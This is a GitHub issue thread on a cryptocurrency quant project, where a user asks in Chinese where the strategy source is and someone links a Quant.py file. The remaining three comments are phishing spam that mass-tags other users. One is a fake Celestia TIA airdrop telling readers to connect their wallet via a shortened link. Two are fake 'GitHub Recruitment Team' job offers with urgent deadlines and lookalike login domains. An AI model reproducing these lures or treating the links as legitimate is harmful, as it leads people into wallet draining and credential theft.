### ISSUE TITLE
策略源码在哪个目录?

### ISSUE THREAD

**Issue by zhanglianzhong** [jiaobit/ThorCryptocurrencyQuant#5]
请问策略源码在哪个目录?并没有看到哦

**Comment by squarebaga** [comment]
https://github.com/fengok/ThorCryptocurrencyQuant/blob/master/GriddingStrategy/Quant.py

**Comment by ligiainhan** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://bit.ly/celestiarewards)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://bit.ly/celestiarewards) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!rsydn9, @xmtuanzi, @Mechwv, @AgwaB, @akinwol, @owlinstack, @7Cedars, @devbluesky111, @Sushruthan222, @842560, @sergeyzavarzin, @josephizatt, @nullbutt, @byte14, @xihawang, @daotoan-hd, @OrlovDiga, @mesutpiskin, @rajeebkm, @AhadWeb3

**Comment by carlosportillo** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
bon943, @boilerrat, @Beginner1166, @TheNuelgeek, @milosdjurica, @powether, @cnTailor, @Marknetic, @nunoedgar-invest, @csabahalas, @zrthxn, @ariyoshi-hyt, @proteanx, @volatikus, @viteshan, @irnhax, @halvves, @slavakurilyak, @Veblin, @vikshithgowda

**Comment by 1997cui** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
TimDaub, @ChakshuGautam, @fifths, @calenfretts, @aghareza, @hqman, @DAMMAK, @castlenick, @DavidLacombe46, @kennir, @shankar14021983, @saadbitcoin, @easychen, @hardikudeshi, @devsaint-star, @JohnChangUK, @cielu, @michhub-dev, @BiaoLiu, @simon5057
